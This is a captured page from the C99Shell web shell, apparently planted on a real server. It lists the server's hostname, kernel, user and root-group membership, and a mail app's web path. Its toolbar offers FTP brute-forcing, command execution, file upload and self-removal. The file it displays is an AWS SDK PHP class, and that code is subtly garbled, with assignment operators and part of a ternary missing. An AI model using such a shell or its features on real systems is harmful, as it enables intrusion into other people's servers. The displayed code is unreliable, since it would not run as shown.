!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/picomail.picotech.app/public_html/vendor/async-aws/core/src/Sts/ValueObject/   drwxr-xr-x
Free 28.67 GB of 117.98 GB (24.3%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     AssumedRoleUser.php (1.6 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace AsyncAws\Core\Sts\ValueObject;

/**
 * The Amazon Resource Name (ARN) and the assumed role ID, which are identifiers that you can use to refer to the
 * resulting temporary security credentials. For example, you can reference these credentials as a principal in a
 * resource-based policy by using the ARN or assumed role ID. The ARN and ID include the `RoleSessionName` that you
 * specified when you called `AssumeRole`.
 */
final class AssumedRoleUser
{
    
/**
     * A unique identifier that contains the role ID and the role session name of the role that is being assumed. The role
     * ID is generated by Amazon Web Services when the role is created.
     */
    
private $assumedRoleId;

    
/**
     * The ARN of the temporary security credentials that are returned from the AssumeRole action. For more information
     * about ARNs and how to use them in policies, see IAM Identifiers in the *IAM User Guide*.
     *
     * @see https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_identifiers.html
     */
    
private $arn;

    
/**
     * @param array{
     *   AssumedRoleId: string,
     *   Arn: string,
     * } $input
     */
    
public function __construct(array $input)
    {
        
$this->assumedRoleId $input['AssumedRoleId'] ?? null;
        
$this->arn $input['Arn'] ?? null;
    }

    public static function 
create($input): self
    
{
        return 
$input instanceof self $input : new self($input);
    }

    public function 
getArn(): string
    
{
        return 
$this->arn;
    }

    public function 
getAssumedRoleId(): string
    
{
        return 
$this->assumedRoleId;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0036 ]--